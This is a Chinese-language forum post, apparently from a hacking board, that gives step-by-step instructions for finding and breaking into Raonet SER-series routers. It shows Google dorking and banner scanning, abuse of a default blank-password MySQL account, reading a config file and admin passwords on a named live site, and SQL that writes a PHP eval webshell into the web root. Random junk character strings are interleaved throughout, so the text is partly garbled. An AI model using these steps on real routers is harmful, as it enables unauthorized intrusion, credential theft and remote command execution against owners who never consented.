寻找存在漏洞的路由器方法:
0 w- D2 M" U6 |8 ^0 \) v* g4 d6 k/ L$ c6 L
1:google搜索'Raonet Subscriber Ethernet Router'
; u4 {2 k! I. Z) W, O1 W5 k+ f0 _% I$ Q: Y, U' R$ ]
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20018 O$ r# I. z2 x% h3 w
A0 s1 W" T9 t6 N/ ?; U3 T3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
6 P) c# L1 \5 P5 }1 r7 K: S1 s5 @* f
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......5 @" L" D, b$ R" E2 a4 I8 x! Z6 k
$ V& S0 @' R. i, h 5 d- b1 H r" [. q1 g7 r$ o2 q
- U2 B. Z0 o$ o) y( y! }/ ^入侵步骤:3 Z5 J7 m# A$ v& a5 q
1 U+ |6 Y( T5 _* |. [
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php$ t V6 w2 \& ~$ z
. f; `! l. X: Y J0 a8 m! }
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc5 x. D1 c8 D6 @1 s
3:得到密码后连接,查看GUI管理密码:: ?* D& J- n$ Q0 d+ g
use ser_500
8 y( a: ^ H1 u2 ?& `select id,passwd from user;5 z5 U4 c$ H! P; n: e8 r
4:通过数据库写入webshell,执行命令:; q8 l- l4 I% C8 H
use mysql;8 f8 s8 B$ \( `* B, R
create table ok(cmd TEXT);
1 N( k+ L/ ^: u( |5 b9 @) Oinsert into ok values("<?php @eval($_POST[cmd])?>");
+ J# ]0 [/ C9 g% V- a1 g8 }select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php"; W5 V8 d5 X4 n) C* G6 I
drop table ok;
& F# a- t- x6 c4 e5 W5 s8 ]' J+ k1 ?( D+ d! T, j
5:连接后门shell.php : z: ^# H# [4 e3 Y7 F, o/ X* R% P
- {7 g+ S4 [. @. O7 E. l4 `
6. 搞定!1 F' Q9 ~& K" {# k. U" F3 H6 Q$ d
& `6 E& W7 h: J. H6 o+ U
|